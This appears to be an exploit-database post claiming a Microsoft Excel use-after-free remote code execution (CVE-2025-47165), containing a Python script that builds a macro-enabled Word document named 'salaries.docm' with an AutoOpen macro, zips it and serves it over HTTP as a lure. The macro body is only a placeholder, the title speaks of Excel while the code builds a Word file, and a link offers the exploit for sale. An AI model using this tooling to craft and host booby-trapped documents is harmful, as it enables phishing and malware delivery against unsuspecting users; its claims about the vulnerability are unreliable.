
# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024, Microsoft Office LTSC 2021,
# Microsoft 365 Apps for Enterprise

# Description:
An attacker can trick a user into opening a malicious DOCM file, sent by
email or from a streaming server, and thereby running the attacker's code.
Once the victim executes it, their machine can be infected or worse; it
could be the end of their Windows machine! WARNING: DISABLE THE MACRO
OPTIONS IN YOUR OFFICE 365!!!

|
#!/usr/bin/python
|
|
|
|
import http.server
import os
import socket
import socketserver
import sys
import threading
import zipfile

import pythoncom
from win32com.client import Dispatch

# TCP port the throwaway HTTP server listens on; run_server() binds it on
# every interface (""), not only the address it prints.
PORT: int = 8000
# Name of the macro-enabled Word document written by create_docm_with_macro().
DOCM_FILENAME: str = "salaries.docm"
# Name of the archive zip_docm() wraps that document in.
ZIP_FILENAME: str = "salaries.zip"
# Root served by Handler; "." is the current working directory.
DIRECTORY: str = "."

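def create_docm_with_macro(filename=DOCM_FILENAME):
    """Create a macro-enabled Word document (.docm) at *filename*.

    Drives a hidden Word instance over COM: adds a new document, inserts
    ``macro_code`` into its ``ThisDocument`` module with
    ``CodeModule.AddFromString`` and saves it with ``FileFormat=13`` (the
    Word macro-enabled XML format).

    Args:
        filename: Output path; resolved with ``os.path.abspath`` before
            saving.

    Returns:
        None. Any failure while building the document is printed by the
        ``except`` branch rather than raised; Word is always quit and COM
        uninitialised in ``finally``.

    Notes:
        Reaching ``doc.VBProject`` through COM needs the Office Trust Center
        option "Trust access to the VBA project object model" enabled on the
        machine running this script; with the default (off) setting Word
        refuses the access and the error shows up in the ``except`` branch.
        Leaving that option off, and leaving macros disabled, is the
        relevant hardening against documents produced this way.
    """
    pythoncom.CoInitialize()
    word = Dispatch("Word.Application")
    word.Visible = False

    # Bind `doc` before the try: the original left it unbound, so a failure
    # in Documents.Add() made the finally block raise NameError and hide the
    # real error.
    doc = None
    try:
        doc = word.Documents.Add()
        vb_project = doc.VBProject
        vb_component = vb_project.VBComponents("ThisDocument")

        macro_code = '''
Sub AutoOpen()
//YOUR EXPLOIT HERE
// All OF YPU PLEASE WATCH THE DEMO VIDEO
// Best Regards to packetstorm.news and OFFSEC
End Sub
'''

        vb_component.CodeModule.AddFromString(macro_code)

        doc.SaveAs(os.path.abspath(filename), FileFormat=13)
        print(f"[+] Macro-enabled Word document created: (unknown)")

    except Exception as e:
        print(f"[!] Error creating document: {e}")
    finally:
        # Close without saving; SaveAs above already wrote the file.
        if doc is not None:
            doc.Close(False)
        word.Quit()
        pythoncom.CoUninitialize()
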
def zip_docm(docm_path, zip_path):
    """Write *docm_path* into a new deflate-compressed ZIP at *zip_path*.

    The entry is stored under its base name only, so no directory
    components from *docm_path* end up inside the archive. Mode ``'w'``
    means an existing *zip_path* is overwritten.
    """
    entry_name = os.path.basename(docm_path)
    archive = zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
    with archive:
        archive.write(docm_path, arcname=entry_name)
    print(f"[+] Created ZIP archive: {zip_path}")

def get_local_ip():
    """Return the IPv4 address of the interface that would route to 8.8.8.8.

    A UDP "connect" only selects a route; no packet is sent. If the route
    lookup (or the address query) fails, ``"127.0.0.1"`` is returned. The
    probe socket is closed in every case.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        try:
            probe.connect(("8.8.8.8", 80))
            chosen = probe.getsockname()[0]
        except Exception:
            chosen = "127.0.0.1"
    return chosen

class Handler(http.server.SimpleHTTPRequestHandler):
    """Static-file handler pinned to the module-level DIRECTORY.

    Identical to SimpleHTTPRequestHandler except that the served root is
    always DIRECTORY; positional and other keyword arguments are passed
    through unchanged.
    """

    def __init__(self, *args, **kwargs):
        base_init = super().__init__
        base_init(*args, directory=DIRECTORY, **kwargs)

def run_server():
    """Serve DIRECTORY over HTTP on PORT until serve_forever() returns.

    Prints a URL built from get_local_ip() and PORT, then blocks in
    ``serve_forever``; the TCPServer is closed when the ``with`` block
    exits. The bind address is ``""`` (every interface), so the server is
    reachable on more than the one address it prints.
    """
    host = get_local_ip()
    base_url = f"http://{host}:{PORT}"
    print(f"[+] Starting HTTP server on {base_url}")
    print("[+] Place your macro docm and zip files in this directory to serve them.")
    print(f"[+] Access the ZIP file at: {base_url}/{ZIP_FILENAME}")
    server = socketserver.TCPServer(("", PORT), Handler)
    with server as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()

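if __name__ == "__main__":
    # Word automation via pythoncom / win32com only exists on Windows.
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word installed.")
        sys.exit(1)

    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)

    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)

    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()

    # Wait on the server thread instead of `while True: pass`, which pinned a
    # CPU core at 100% for as long as the server ran and kept spinning even
    # after the thread had died (e.g. the port was already in use). A timed
    # join is used so Ctrl+C stays responsive on Windows, where an untimed
    # join may not be interruptible.
    try:
        while server_thread.is_alive():
            server_thread.join(timeout=1.0)
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")
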
```
|
|
|
|
# Reproduce:
|
|
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
|
|
|
|
# Buy an exploit only:
|
|
[href](https://satoshidisk.com/pay/COiBVA)
|
|
|
|
# Time spent:
|
|
01:37:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
|
|
|
|
|
|
--
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstorm.news/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |